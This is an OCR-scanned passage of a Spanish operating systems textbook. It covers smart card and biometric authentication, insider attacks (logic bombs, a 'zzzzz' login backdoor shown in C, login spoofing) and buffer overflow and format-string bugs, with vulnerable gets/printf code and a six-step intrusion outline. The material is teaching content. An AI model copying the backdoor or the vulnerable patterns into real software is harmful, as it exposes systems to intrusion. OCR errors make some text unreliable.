para el lector. Con el tiempo las tarjetas se están volviendo más inteligentes, pero están restringidas 
de varias formas, incluyendo la profundidad del chip (ya que está incrustado en la tarjeta), la an¬ 
chura del chip (para que no se rompa cuando el usuario doble la tarjeta) y el costo (por lo general 
entre $1 y $20, dependiendo del poder de la CPU, el tamaño de la memoria y la presencia o ausen¬ 
cia de un coprocesador criptográfico). 
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Las tarjetas inteligentes se pueden utilizar para guardar dinero al igual que las tarjetas de valor 
almacenado, pero con una mayor seguridad y universalidad. Las tarjetas se pueden cargar con di¬ 
nero en una máquina ATM o en el hogar por medio del teléfono, utilizando un lector especial sumi¬ 
nistrado por el banco. Cuando se inserta en el lector de un comerciante, el usuario puede autorizar 
la tarjeta para deducir cierta cantidad de dinero de ella (al escribir SÍ), con lo cual la tarjeta envía 
un pequeño mensaje cifrado al comerciante. Después, el comerciante puede llevar el mensaje a un 
banco para cobrar el monto que se pagó. 

La gran ventaja de las tarjetas inteligentes sobre las tarjetas de crédito o débito, por ejemplo, 
es que no necesitan una conexión en línea a un banco. Si no piensa que ésta es una ventaja, realice 
el siguiente experimento. Trate de comprar un caramelo en una tienda e insista en pagar con una tar¬ 
jeta de crédito. Si el comerciante se rehúsa, diga que no trae consigo efectivo y que además necesi¬ 
ta las millas de viajero frecuente. Descubrirá que el comerciante no está muy entusiasmado con la 
idea (debido a que los costos asociados reducirían la ganancia sobre el artículo). Esto hace que las 
tarjetas inteligentes sean útiles para las compras pequeñas en las tiendas, los teléfonos de paga, 
los parquímetros, las máquinas expendedoras y muchos otros dispositivos que por lo general requie¬ 
ren monedas. Se utilizan mucho en Europa y se están empezando a usar en todas partes. 

Las tarjetas inteligentes tienen muchos otros usos potenciales (como codificar las alergias 
y demás condiciones médicas del portador en forma segura, para utilizar esta información en emer¬ 
gencias), pero no veremos eso aquí. Nos interesa la forma en que se pueden utilizar para una 
autenticación de inicio de sesión segura. El concepto básico es simple: una tarjeta inteligente es 
una computadora pequeña a prueba de falsificaciones, que puede entablar una discusión (protoco¬ 
lo) con una computadora central para autenticar al usuario. Por ejemplo, un usuario que desee 
comprar cosas en un sitio Web de comercio electrónico podría insertar una tarjeta inteligente en 
un lector doméstico conectado a su PC. El sitio de comercio electrónico no sólo utilizaría la tarje¬ 
ta inteligente para autenticar al usuario de una manera más segura que una contraseña, sino que 
también podría deducir el precio de compra de la tarjeta inteligente de manera directa, eliminan¬ 
do una gran parte de la sobrecarga (y del riesgo) asociada con el uso de una tarjeta de crédito pa¬ 
ra las compras en línea. 

Es posible utilizar varios esquemas de autenticación con una tarjeta inteligente. Una autentica¬ 
ción específica de reto-respuesta simple funciona de la siguiente manera. El servidor envía un núme¬ 
ro aleatorio de 512 bits a la tarjeta inteligente, la que a su vez le suma la contraseña de 512 bits del 
usuario que está almacenada en la ROM . Luego se aplica el cuadrado a la suma y los 512 bits de la 
parte media se envían de vuelta al servidor, que conoce la contraseña del usuario y puede calcular si 
el resultado es correcto o no. La secuencia se muestra en la figura 9-20. Si una persona que interven¬ 
ga los cables de red ve ambos mensajes, no podrá averiguar mucho sobre la información, y es inútil 
guardarlos para un uso posterior, ya que en el siguiente inicio de sesión se enviará un número alea¬ 
torio de 512 bits distinto. Desde luego que se puede utilizar un algoritmo más elegante que aplicar el 
cuadrado, y siempre es así. 

Una desventaja de cualquier protocolo criptográfico fijo es que con el curso del tiempo alguien 
puede quebrantarlo, y la tarjeta inteligente sería inutilizable. Una manera de evitar esto es utilizar 
la ROM en la tarjeta no para un protocolo criptográfico, sino para un intérprete de java. Después 
se descarga el verdadero protocolo criptográfico en la tarjeta como un programa binario de java, 
y se ejecuta como intérprete. De esta forma, tan pronto como se quebrante un protocolo, se podrá 
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Computadora 



inteligentes 


Figura 9-20. Uso de una tarjeta inteligente para la autenticación. 


instalar uno a nivel mundial en forma simple: la próxima vez que se utilice la tarjeta, se instalará el 
nuevo software en ella. U na desventaja de este método es que reduce la velocidad en una tarjeta que 
de por sí es lenta, pero a medida que mejora la tecnología este método es muy flexible. Otra des¬ 
ventaja de las tarjetas inteligentes es que una tarjeta perdida o robada puede estar sujeta a un ata¬ 
que de canal lateral, como un ataque de análisis de energía. Al observar la energía eléctrica que se 
consume durante las operaciones de cifrado repetidas, un experto con el equipo adecuado puede de¬ 
ducir la clave. Si se mide el tiempo para cifrar con varias claves elegidas de manera especial tam¬ 
bién se puede proporcionar información valiosa sobre la clave. 

9.4.3 Autenticación mediante biométrica 

El tercer método de autenticación mide las características físicas del usuario que son difíciles de fal¬ 
sificar. A estas características se les conoce como blométrlcas (Pankanti y colaboradores, 2000). 
Por ejemplo, un lector de huellas digitales o de voz conectado a la computadora podría verificar la 
identidad del usuario. 

U n sistema biométrico común consta dedos partes: inscripción e identificación. Durante la ins¬ 
cripción se miden las características del usuario y se digitalizan los resultados. Las características 
importantes se extraen y almacenan en un registro asociado con el usuario. El registro se puede 
guardar en una base de datos central (por ejemplo, para iniciar sesión en una computadora remota) 
o se puede almacenar en una tarjeta inteligente que el usuario lleva consigo, y que inserta en un lec¬ 
tor remoto (por ejemplo, una máquina ATM ). 

La otra parte es la identificación. El usuario aparece y proporciona un nombre de inicio de se¬ 
sión. Después el sistema realiza de nuevo la medición. Si los nuevos valores coinciden con los que 
se muestrearon al momento de la inscripción, se acepta el inicio de sesión; en caso contrario se re¬ 
chaza. EI nombre de inicio de sesión se necesita debido a que las mediciones nunca son exactas, por 
lo que es difícil indexarlas y después buscar con base en el índice. Además, dos personas podrían 
tener las mismas características, por lo que es más firme requerir que las características medidas 
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coincidan con ias de un usuario específico que sóio requerir que coincidan con ias de cuaiquier 
usuario. 

La característica eiegida debe tener ia suficiente variabiiidad como para que ei sistema pueda 
distinguir unas personas de otras sin error. Por ejempio, ei coior dei cabeiio no es un buen indica¬ 
dor, ya que muchas personas comparten ei mismo coior. Además, ia característica no debe variar 
con ei tiempo, y en aigunas personas ei coior dei cabeiio no tiene esta propiedad. De manera simi- 
iar, ia voz de una persona podría ser distinta si tiene un resfriado y un rostro podría verse diferente 
debido a una barba o por no traer maquiiiaje ai momento de inscribirse. Como ias muestras poste¬ 
riores nunca van a coincidir de manera exacta con ios vaiores de ia inscripción, ios diseñadores dei 
sistema tienen que decidir sobre ia caiidad de ia coincidencia para poder aceptada. En especiai, tie¬ 
nen que decidir entre si es peor rechazar a un usuario iegítimo de vez en cuando, o dejar que entre 
un impostor de vez en cuando. Un sitio de comercio eiectrónico tai vez decida que podría ser peor 
rechazar a un ciiente ieai que aceptar una pequeña cantidad de fraude, mientras que un sitio de ar¬ 
mas nucieares podría decidir que rehusar ei acceso a un empieado genuino sería mejor que dejar en¬ 
trar a extraños ai azar dos veces ai año. 

Ahora vamos a anaiizar en forma breve aigunas de ias medidas biométricas que se utiiizan en 
ia actuaiidad. Ei anáiisis de ia iongitud de ios dedos es sorprendentemente práctico. Cuando se uti- 
iiza, cada computadora tiene un dispositivo como ei de ia figura 9-21. Ei usuario inserta su mano 
en éi; a continuación se mide ia iongitud de todos sus dedos y se comprueba en ia base de datos. 



Sin embargo, ias mediciones de iongitud de ios dedos no son perfectas. Ei sistema puede ser 
atacado con moides para manos hechos de Yeso París o de aigún otro materiai, tai vez con dedos 
ajustabies para permitir cierta experimentación. 
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Otra biométrica con uso comercial amplio es el reconocimiento dei iris. No hay dos personas 
que tengan los mismos patrones (ni siquiera los gemelos idénticos), por lo que este método es tan 
bueno como el de las huellas digitales, y se automatiza con más facilidad (Daugman, 2004). El su¬ 
jeto sólo ve a través de una cámara (a una distancia de hasta 1 metro), la cual fotografía los ojos del 
sujeto y extrae ciertas características mediante lo que se conoce como una transformación con on- 
dícuiasdeGabor, y comprime los resultados a 256 bytes. Esa cadena se compara con el valor ob¬ 
tenido al momento de la inscripción, y si la distancia de Hamming está por debajo de cierto valor 
de umbral crítico, la persona es autenticada (la distancia de Hamming entre dos cadenas de bits es 
el número mínimo de cambios necesarios para transformar una cadena en la otra). 

Cualquier técnica que se base en imágenes está sujeta a la suplantación de identidad. Por ejem¬ 
plo, una persona podría llegar al equipo (digamos, la cámara de una máquina ATM) usando lentes 
oscuros que estuvieran pegadas fotografías de los ojos de otra persona. Después de todo, si la cáma¬ 
ra del ATM puede tomar una buena foto del iris a un metro, otras personas pueden hacerlo también, 
y a mayores distancias si utilizan teleobjetivos. Foresta razón tal vez se necesiten contramedidas, co¬ 
mo hacer que la cámara dispare un flash, no para fines de iluminación sino para ver si la pupila se 
contrae en respuesta, o para ver si el temido efecto de ojos rojos del fotógrafo amateur aparece en la 
imagen con flash, pero está ausente cuando no se utiliza flash. El aeropuerto deAmsterdam ha esta¬ 
do utilizando la tecnología de reconocimiento del iris desde 2001 para permitir que los viajeros fre¬ 
cuentes eviten la línea de inmigración normal. 

El análisis de firmas es una técnica algo distinta. El usuario firma con una pluma especial co¬ 
nectada a la computadora, y ésta la compara con un espécimen conocido almacenado en línea, o en 
una tarjeta inteligente. M ejor aún es no comparar la firma, sino los movimientos de la pluma y la pre¬ 
sión que se ejerce al escribir. Un buen falsificador tal vez pueda copiar la firma, pero no tendrá idea 
sobre el orden exacto en el que se hicieron los trazos, o con qué velocidad o presión se hicieron. 

La biométrica de voz es un esquema que se basa en un hardware especial mínimo (M arkowitz, 
2001). Todo lo que se requiere es un micrófono (o incluso un teléfono): el resto es software. En 
contraste con los sistemas de reconocimiento de voz, que tratan de determinar lo que dice el ora¬ 
dor, estos sistemas tratan de determinar quién es el orador. Algunos sistemas sólo requieren que el 
usuario diga una contraseña secreta, pero un fisgón puede vencerlos al grabar en cinta las contra¬ 
señas y reproducirlas posteriormente. Los sistemas más avanzados dicen algo al usuario y le piden 
que lo repita, y se utilizan textos distintos para cada inicio de sesión. Algunas empresas están em¬ 
pezando a utilizar la identificación de voz para aplicaciones como las compras en el hogar por vía 
telefónica ya que está menos propensa a los fraudes que el uso de un código NIP para la identifi¬ 
cación. 

Podríamos continuar de manera indefinida con más ejemplos, pero sólo mencionaremos dos 
más para aclarar un punto importante. Los gatos y otros animales marcan su territorio al orinar 
alrededor de su perímetro. A parentemente, los gatos se pueden identificar unos con otros de esta 
forma. Suponga que llega alguien con un pequeño dispositivo capaz de realizar un análisis de ori¬ 
na instantáneo, con lo cual puede proveer una identificación a prueba de errores. Cada compu¬ 
tadora estaría equipada con uno de estos dispositivos, junto con un anuncio discreto con la 
siguiente leyenda: "Para iniciar sesión, deposite aquí la muestra". Éste podría ser un sistema com¬ 
pletamente inquebrantable, pero tal vez tendría un grave problema de aceptación por parte de los 
usuarios. 
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Se podría decir lo mismo de un sistema consistente en una chincheta y un pequeño espectró¬ 
grafo. Se pediría al usuario que presionara su pulgar contra la chincheta, con lo cual se extraería una 
gota de sangre para el análisis espectrográfico. El punto es que cualquier esquema de autenticación 
debe ser psicológicamente aceptable para la comunidad de usuarios. Tal vez las mediciones de lon¬ 
gitud de los dedos no provoquen ningún problema, pero incluso algo tan no intrusivo como alma¬ 
cenar las huellas digitales en línea puede ser inaceptable para muchas personas, porque asocian la 
toma de huellas digitales con el fichaje de criminales. 


9.5 ATAQUES DESDE EL INTERIOR 

Hemos visto con cierto detalle la forma en que funciona la autenticación de usuarios. Por desgra¬ 
cia, evitar que los visitantes indeseables inicien sesión es sólo uno délos muchos problemas de se¬ 
guridad existentes. Los "trabajos internos" podrían ser una categoría completamente distinta 
de problemas de seguridad. Los programadores y otros empleados de la empresa que operan la 
computadora que se debe proteger, o que crean software crítico, son los que ejecutan estos tipos 
de trabajos. Estos ataques son distintos de los externos, debido a que los usuarios internos tienen 
conocimiento y acceso especializados que los externos no tienen. A continuación veremos unos 
ejemplos, todos los cuales han ocurrido repetidas veces en el pasado. Cada uno tiene sus diferen¬ 
cias en cuanto a la persona que realiza el ataque, quién está siendo atacado y qué es lo que trata 
de lograr el atacante. 


9.5.1 Bombas lógicas 

En estos tiempos de externalización masiva, los programadores se preocupan comúnmente por sus 
trabajos. Algunas veces hasta realizan ciertos pasos para que su potencial partida (involuntaria) 
sea menos doloroso. Para aquellos que se inclinan a favor del chantaje, una estrategia es crear una 
bomba lógica. Este dispositivo es una pieza de código escrita por uno de los programadores de 
una empresa (que en ese momento son empleados), y se inserta de manera secreta en el sistema 
de producción. M ientras que el programador le proporcione su contraseña diaria, no hará nada. N o 
obstante, si el programador es despedido de manera repentina y se le desaloja físicamente de las ins¬ 
talaciones sin advertirle, el siguiente día (o la siguiente semana) la bomba lógica no recibirá su con¬ 
traseña diaria, por lo que se activará. También son posibles muchas variantes sobre este tema. En 
un caso famoso, la bomba lógica comprobaba la nómina: si el número personal del programador no 
aparecía en ella durante dos periodos de nómina consecutivos, se activaba (Spafford y colaborado¬ 
res, 1989). 

Al activarse la bomba tal vez se empiece a borrar el contenido del disco, eliminando archivos 
al azar, realizando cuidadosamente cambios difíciles de detectar en los programas clave o cifrando 
archivos esenciales. En este último caso, la empresa tiene que tomar una difícil decisión entre lla¬ 
mar a la policía (que podría o no resultar en una condena muchos meses después, pero sin duda no 
restaurará los archivos faltantes) o ceder al chantaje y volverá contratar al programador como "con- 
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sultor" por una suma astronómica para que corrija ei probiema (y esperar que no piante nuevas 
bombas iógicas mientras io hace). 

Se han registrado casos en ios que un virus piantó una bomba iógica en ias computadoras que 
infectó. En generai, estas bombas se programaron para activarse ai mismo tiempo en cierta fecha y 
hora en ei futuro. Sin embargo, como ei programador no sabe de antemano qué computadoras su¬ 
frirán ios ataques, ias bombas iógicas no se pueden utiiizar para proteger ei trabajo o ei chantaje. A 
menudo se configuran para activarse en una fecha que tenga cierto significado poiítico. A estas 
bombas se Íes conoce aigunas veces como bombas de tiempo. 

9.5.2 Trampas 

Otro hoyo de seguridad que producen ios usuarios internos es ia trampa. Este probiema se crea 
mediante ei código que inserta un programador de sistemas para evitar cierto chequeo de rutina. 
Por ejempio, un programador podría agregar código ai programa de inicio de sesión para permitir 
que cuaiquiera pueda iniciar sesión con ei nombre "zzzzz", sin importar qué haya en ei archivo 
de contraseñas. Ei código normai en ei programa de inicio de sesión podría ser como ei de ia figu¬ 
ra 9-22(a). La trampa sería ei cambio en ia figura 9-22(b). Lo que hace ia iiamada a strcmp es com¬ 
probar si ei nombre de inicio de sesión es "zzzzz". De ser así ei inicio de sesión tiene éxito, sin 
importar qué contraseña se utiiice. Si este código de trampa io insertara un programador que traba¬ 
je para un fabricante de computadoras, y después io enviara con sus computadoras, ei programador 
podría iniciar sesión en cuaiquier computadora fabricada por su empresa, sin importar quién sea ei 
dueño ni ia información que contenga ei archivo de contraseñas. Lo mismo se apiica para un pro¬ 
gramador que trabaja para un distribuidor de sistemas operativos. La puerta simpiemente pasa por 
aito todo ei proceso de autenticación. 


while (TRUE) { 
printf{‘‘usuar¡o: “); 
obtener_cadena(nombre); 
deshabilitar_eco(); 
pr¡ntf(“contrasenia: “); 
obtener_cadena(contrasenia); 
habilitar_eco(); 

V = comprobar_validez(nombre, contrasenia); 
if (v) break; 


while (TRUE) { 
printf(‘‘usuario: “); 
obtener_cadena(nombre); 
deshabilitar_eco(); 
printf(“contrasenia: “); 
obtener_cadena(contrasenia); 
habilitar_eco(); 

V = comprobar_validez(nonnbre, contrasenia); 
if (v II strcmp(nonnbre, “zzzzz”) == 0) break; 


ejecutar_shell(nombre); 

(a) 


ejecutar_shell(nombre); 

(b) 


Figura 9-22. (a) Código normal, (b) Código en el que se inserta una trampa. 


Una manera en que ias empresas pueden evitar ias trampas es hacer revisiones de código 
como una práctica estándar. Con esta técnica, una vez que un programador termina de escribir y 
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probar un módulo, éste se comprueba en una base de datos de código. Cada cierto tiempo se reú¬ 
nen ios programadores en un equipo, y cada uno deeiios se para frente ai grupo para expiicar io que 
hace su código, iínea por iínea. Esta estrategia no sóio aumenta ia probabiiidad dequeaiguien pue¬ 
da detectar una trampa, sino también ei riesgo para ei programador, ya que si io atrapan con ias ma¬ 
nos en ia masa, su carrera no se beneficiará mucho. Si ios programadores protestan demasiado ai 
proponed es este método, también es posibie tener dos compañeros trabajadores que comprueben ei 
código de ios demás. 

9.5.3 Suplantación de identidad en el inicio de sesión 

En este ataque interno, ei perpetrador es un usuario iegítimo que trata de recoiectar ias contraseñas 
de otras personas por medio de una técnica conocida como suplantación de identidad en el inicio 
de sesión. Por io generai se empiea en empresas con muchas computadoras púbiicas en una LAN 
utiiizada por muchos usuarios. Porejempio, muchas universidades tienen saiones henos de compu¬ 
tadoras donde ios estudiantes pueden iniciar sesión en cuaiquiera de eiias. Esto funciona así. Nor- 
maimente, cuando no hay nadie conectado a una computadora UNIX, aparece una pantalla similar 
a la de la figura 9-23(a). Cuando un usuario se sienta y escribe un nombre de inicio de sesión, el 
sistema le pide una contraseña. Si es correcta, el usuario comienza su sesión y se inicia un shell (y 
posiblemente también una GUI). 


Usuario: 


(b) 

Figura 9-23. (a) Pantalla correcta de inicio de sesión, (b) Pantalla falsa de inicio de 
sesión. 

Ahora considere este caso. Un usuario malicioso de nombre Mal escribe un programa para 
mostrar la pantalla de la figura 9-23(b). Tiene una apariencia sorprendente con la pantalla de la fi¬ 
gura 9-23(a), excepto que no se está ejecutando el programa de inicio de sesión del sistema, sino 
uno falso escrito por M al. Ahora M al ejecuta su programa de inicio de sesión falso y se aleja para 
observar la diversión desde una distancia segura. Cuando un usuario se sienta y escribe un nombre 
de inicio de sesión, el programa responde pidiendo una contraseña y deshabilita el eco en la panta¬ 
lla. Una vez que se recolectan el nombre de inicio de sesión y la contraseña, se anotan en un archi¬ 
vo y el programa falso envía una señal para eliminar su shell. Esta acción desconecta a M al del 
sistema y activa el verdadero programa de inicio de sesión para que muestre el indicador de la fi¬ 
gura 9-23(a). El usuario asume que tuvo un error de escritura y simplemente vuelve a escribir sus 
datos. Esta vez sí funciona. M ientras tanto, M al ha adquirido otro par (nombre de inicio de sesión 
y contraseña). Al iniciar sesión en muchas computadoras y ejecutar el suplantador en todas ellas, 
puede recolectar muchas contraseñas. 


Usuario: 


(a) 















659 


SECCIÓN 9.6 CÓMO EXPLOTAR LOS ERRORES (BUGS) EN EL CÓDIGO 

La única manera real de evitar esto es hacer que la secuencia de inicio de sesión empiece 
con una combinación de teclas que los usuarios de programas no puedan detectar. Windows utili¬ 
za CTRL-ALT-SUPR para este fin. Si un usuario se sienta en una computadora y escribe primero 
CTRL-ALT-SUPR, el usuario actual se desconecta y se inicia el programa de inicio de sesión del 
sistema. No hay forma de evadir este mecanismo. 

9.6 CÓMO EXPLOTAR LOS ERRORES (BUGS) EN EL CÓDIGO 

Ahora que hemos visto algunas formas en que los usuarios internos pueden poner en peligro la se¬ 
guridad, es tiempo de iniciar nuestro estudio sobre cómo pueden atacar los usuarios externos y tras¬ 
tornar el sistema operativo desde el exterior, por lo general a través de Internet. Casi todos los 
mecanismos de ataque aprovechan los errores en el sistema operativo, o en algún programa de apli¬ 
cación popular como Internet Explorer o M icrosoft Office. El escenario típico es que alguien descu¬ 
bre un error en el sistema operativo y después encuentra la manera de explotarlo para comprometer 
a las computadoras que ejecutan el código defectuoso. 

Aunque toda explotación implica tener un error específico en un programa específico, hay va¬ 
rias categorías generales de errores que ocurren una y otra vez, y vale la pena estudiarlos para ver 
cómo funcionan los ataques. En las siguientes secciones examinaremos varios de estos métodos. 
Tenga en cuenta que como éste es un libro sobre sistemas operativos, el enfoque está en cómo tras¬ 
tornar al sistema operativo. A quí no trataremos con las diversas formas en las que se pueden explo¬ 
tar los errores de software para atacar sitios Web y bases de datos. 

Hay varias formas en que se pueden explotar los errores. Una manera simpley directa es que 
el atacante inicie una secuencia de comandos que realice lo siguiente: 

1. Ejecutar una exploración de puertos automatizada para encontrar máquinas que acepten co¬ 
nexiones teinet. 

2. Tratar de iniciar sesión adivinando las combinaciones de nombre de inicio de sesión y con¬ 
traseña. 

3. U na vez adentro, ejecutar el programa defectuoso con datos de entrada que activen el error. 

4. Si el programa contiene errores en SETUID root, crear un shell SETUID root. 

5. Obtener e iniciar un programa zombie que escuche en un puerto IP en espera de comandos. 

6 . Hacer que el programa zombie se inicie siempre que el sistema reinicie. 

La secuencia de comandos se puede ejecutar por mucho tiempo, pero hay una buena probabilidad 
de que tenga éxito en un momento dado. AI asegurar que el programa zombie se i nicle cada vez que 
se reinicie la computadora, el atacante se asegura de que siempre sea una computadora zombie. 

Otro escenario común es iniciar un virus que infecte a las máquinas por Internet y explotar el 
error después deque el virus se instale en una nueva máquina. En esencia, se reemplazan los pasos 
1 y 2 de la secuencia anterior pero se siguen aplicando los demás. De cualquier forma, el programa 
del atacante se ejecutará en la máquina de destino, casi siempre sin que el usuario lo sepa y sin que 
el programa divulgue su presencia. 
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9.6.1 Ataques de desbordamiento del búfer 

U na de las fuentes más extensas de ataques se debe al hecho de que casi todos los sistemas opera¬ 
tivos y la mayoría de los programas de sistemas están escritos en el lenguaje de programación C 
(esto es porque a los programadores les gusta y se puede compilar con una eficiencia extrema). Por 
desgracia, ningún compilador de C realiza la comprobación de los límites en los arreglos. En con¬ 
secuencia, tampoco se revisa la siguiente secuencia de código, que no es válida: 

int i; 

char c[1024]; 

i = 12000; 

c[i] = 0; 

El resultado es que se sobrescribe cierto byte de memoria que esté a una posición de 10,976 bytes 
fuera del arreglo, posiblemente con consecuencias desastrosas. No se realiza ninguna comprobación 
en tiempo de ejecución para evitar este error. 

Esta propiedad de C produce ataques del tipo descrito a continuación. En la figura 9-24(a) po¬ 
demos ver la ejecución del programa principal, con sus variables locales en la pila. En cierto pun¬ 
to llama a un procedimiento A, como se muestra en la figura 9.24(b). La secuencia de llamadas 
estándar empieza por meter la dirección de retorno (que apunta a la instrucción que sigue de la lla¬ 
mada) en la pila. Después transfiere el control a A, que incrementa el apuntador de la pila para asig¬ 
nar espacio a sus variables locales. 


Espacio de direcciones 
virtuaies 


OxFFFF...r 


Apuntador 
de ia piia 


Variabies 
iocaies 
de main 


Programa 


Espacio de direcciones 
virtuaies 


Espacio de direcciones 
virtuaies 


> Piia 

J Dirección 
de retorno 

Variabies 
iocaies 
de main 

Dirección 
de retorno 

Variables 
locales 
de main 




* 

Apuntador 

Variabies 
iocaies de A M 

\ Apuntador 

Variables 
locales de A 

b; 

de ia piia 

Búfer B 

de ia pila 



Programa ^ 

i 

Programa 


(a) (b) (c) 

Figura 9-24. (a) Situación en la que el programa principal está en ejecución, (b) Des¬ 
pués de llamar al procedimiento A. (c) El desbordamiento del búfer se muestra en co¬ 
lor gris. 

Suponga que el trabajo de A necesita adquirir la ruta de archivo completa (tal vez concatenan¬ 
do la ruta de directorio actual con un nombre de archivo) para después abrir el archivo o realizar 
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alguna otra operación con él. A tiene un búfer (arreglo) B de tamaño fijo para guardar un nombre de 
archivo, como se muestra en la figura 9-24(b). Es mucho más fácil programar el uso de un búfer 
de tamaño fijo para guardar el nombre de archivo que determinar primero el tamaño actual, y después 
asignar suficiente espacio en forma dinámica. Si el búfer es de 1024 bytes, eso basta para manejar to¬ 
dos los nombres de archivo, ¿no? En especial si el sistema operativo limita los nombres de archivo (o 
mejor aún, las rutas completas) a un máximo de 255 caracteres (o algún otro número fijo). 

Por desgracia, este razonamiento contiene un error fatal. Suponga que el usuario del programa 
proporciona un nombre de archivo que tiene 2000 caracteres de longitud. Si se utiliza su nombre, el 
archivo no se abrirá, pero al atacante no le preocupa. Cuando el procedimiento copia el nombre 
de archivo en el búfer, el nombre hace que se desborde el búfer y sobrescribe parte de la memoria, 
como se muestra en el área gris de la figura 9-24(c). Peor aún, si el nombre de archivo es muy largo 
también sobrescribirá la dirección de retorno, por lo que cuando regrese el procedimiento A, la di¬ 
rección de retorno se tomará de la parte media del nombre de archivo. Si esta dirección es basura al 
azar, el programa saltará a una dirección aleatoria y probablemente fallará después de unas cuantas 
instrucciones. 

Pero ¿qué pasa si el nombre de archivo no contiene basura al azar? ¿Qué pasa si contiene un 
programa binario válido y el diseño ha sido muy, pero muy cuidadoso para que la palabra que se 
superpone a la dirección de retorno sea la dirección de inicio del programa, por ejemplo la direc¬ 
ción de B? Lo que ocurrirá es que cuando A regrese, se empezará a ejecutar el programa que está 
ahora en B. En efecto, el atacante ha sobrescrito la memoria con su propio código y ha logrado que 
se ejecute. 

El mismo truco se aplica con objetos que no sean nombres de archivos. Funciona con cadenas 
de entorno muy largas, datos de entrada de los usuarios o cualquier otra cosa en donde el progra¬ 
mador haya creado un búfer de tamaño fijo para manejar una cadena, que debe ser corta, suminis¬ 
trada por el usuario. AI proporcionar una cadena larga creada a mano que contenga un programa, es 
posible lograr meter el programa en la pila y después se ejecute. Se sabe que la función gets de la 
biblioteca de C — que lee una cadena (de tamaño desconocido) y la coloca en un búfer de tamaño 
fijo pero sin comprobar si hay desbordamiento— es notoria por padecer este tipo de ataque. Algu¬ 
nos compiladores incluso detectan el uso de gets y emiten una advertencia. 

Ahora viene la parte mala. Suponga que el programa que está sufriendo el ataque es SETUID 
root en UNIX (o que tiene poder de Administrador en Windows). Ahora el código insertado puede 
crear varias llamadas al sistema para convertir el archivo de shell del atacante (que está en el dis¬ 
co) en SETUID root, de manera que cuando se ejecute tenga poder de superusuario: de manera al¬ 
ternativa, entonces puede asignar una biblioteca compartida preparada en forma especial que pueda 
realizar todo tipo de daños. O simplemente puede realizar una llamada al sistema exec para super¬ 
poner el Shell en el programa actual, creando un shell con poderes de superusuario. 

O lo que es peor, puede descargar un programa o secuencia de comandos de Internet y alma¬ 
cenarlo en el disco. Después puede crear un proceso para ejecutar el programa o secuencia de co¬ 
mandos. Así, este proceso puede escuchar en un puerto IP específico, esperando comandos del 
exterior para ejecutarlos y convertir la máquina en un zombie. Para evitar que el nuevo zombie se 
pierda cuando se reinicie la máquina, el código atacante sólo tiene que hacer los arreglos para que 
el programa o secuencia de comandos recién obtenido se inicie cada vez que inicie la máquina. Es¬ 
to es fácil de hacer en sistemas Windows y UNIX. 
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U na fracción considerable de todos los problemas de seguridad se debe a este error, que es di¬ 
fícil corregir, debido a que hay muchos programas de C que no comprueban el desbordamiento del 
búfer. 

Es fácil detectar que un programa tiene problemas de desbordamiento de búfer: sólo hay que 
suministrarle nombres de archivo de 10,000 caracteres o algo similar inesperado para ver si vacía 
el núcleo. El siguiente paso es analizar el vaciado de núcleo para ver dónde se guarda el flujo lar¬ 
go. A partir de ahí, no es tan difícil averiguar cuál es el carácter que sobrescribe la dirección de re¬ 
torno. Si está disponible el código fuente, como para la mayoría de los programas de UNIX, el 
ataque es incluso más sencillo debido a que la distribución de la pila se conoce de antemano. Para 
defenderse contra el ataque, hay que corregir el código para que compruebe de manera explícita la 
longitud de todas las cadenas suministradas por el usuario antes de insertarlas en búferes de longi¬ 
tud fija. Por desgracia, el hecho de que cierto programa sea vulnerable a este tipo de ataques por lo 
general se muestra después de un ataque exitoso. 

9.6.2 Ataques mediante cadenas de formato 

Algunos programadores detestan escribir en la computadora aunque sean excelentes mecanógrafos. 
¿Por qué nombrar una variable como cuenta_referencia cuando es obvio que cr significa lo mismo 
y nos ahorra 15 pulsaciones de tecla en cada ocurrencia? Esta renuencia a escribir puede producir 
algunas veces fallas catastróficas en el sistema, como veremos a continuación. 

Considere el siguiente fragmento de un programa de C que imprime la tradicional bienvenida 
al lenguaje C al inicio de un programa: 

char *s = “Hola programador”; 

printf(“%s”,s); 

En este programa se declara la variable de cadena s y se inicializa con una cadena que consiste en 
"Hola programador" y un bytecero para indicar el final de la cadena. La llamada a la función printf 
tiene dos argumentos: la cadena de formato "%s", que le indica que debe imprimir una cadena, y la 
dirección de la misma. Al ejecutarse esta pieza de código, se imprime la cadena en la pantalla (o a 
donde vaya la salida estándar). El código es correcto y a prueba de balas. 

Pero suponga que el programador se vuelve flojo y en vez de lo anterior escribe: 

char *s = “Hola programador”; 

printf(s); 

Esta llamada a printf se permite, ya que printf tiene un número variable de argumentos, de los cua¬ 
les el primero debe ser una cadena de formato. Pero una cadena que no contenga información de 
formato (como "%s") es legal, así que aunque la segunda versión no es una buena práctica de pro¬ 
gramación, es permitida y funciona. Lo mejor de todo es que ahorra la escritura de cinco caracte¬ 
res, sin duda una gran ganancia. 

Seis meses después se instruye a otro programador para que modifique el código, de manera 
que primero se pida al usuario su nombre, para luego darle la bienvenida por su nombre. Después 
de estudiar el código en forma apresurada, lo cambia un poco: 
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char s[100], g[100] = “Hola”; 

gets(s) 

strcat(g, s); 

printf(g); 


/* declara s y g; inicializa g 7 
/* lee una cadena del teclado y la coloca en s 7 
/* concatena s al final de g 7 
/* imprime g 7 


Ahora lee una cadena, la coloca en la variable s y la concatena con la cadena g inicializada para 
construir el mensaje de salida en g. Aún funciona. Hasta ahora todo va bien (excepto por el uso de 
gets, que está sujeto a los ataques de desbordamiento de búfer, pero es fácil de usar y sigue siendo 
popular). 

Sin embargo, un usuario conocedor que viera este código, se daría cuenta con rapidez de que 
la entrada que se acepta del teclado no es sólo una cadena: es una cadena de formato y como tal, 
funcionarán todas las especificaciones de formato permitidas por printf. A unque la mayoría de los 
indicadores de formato tales como "%s" (para imprimir cadenas) y "%d" (para imprimir enteros de¬ 
cimales) dan formato a la salida, hay unos cuantos que son especiales. Por ejemplo, "%n" no im¬ 
prime nada, sino que calcula cuántos caracteres se debe haber enviado ya como salida en la posición 
en la que aparezca en la cadena, y almacena este valor en el siguiente argumento de printf para pro¬ 
cesarlo. He aquí un programa de ejemplo sobre el uso de "%n": 

int main(int argc, char *argv[]) 

{ 

int i=0; 

printf(“Hola %nprogramaclor\n”, &i); /* %n se almacena en i 7 

printf(“i=%cl\n”, i); /* ahora i es 6 7 


Cuando este programa se compila y ejecuta, el resultado es: 

Hola programador 
i=6 

Observe que la variable i se ha modificado mediante una llamada a printf, algo que no es obvio pa¬ 
ra todos. A unque esta característica es útil de vez en cuando, significa que si se imprime una cade¬ 
na de formato tal vez se almacene una palabra (o muchas) en la memoria. ¿Fue una buena idea 
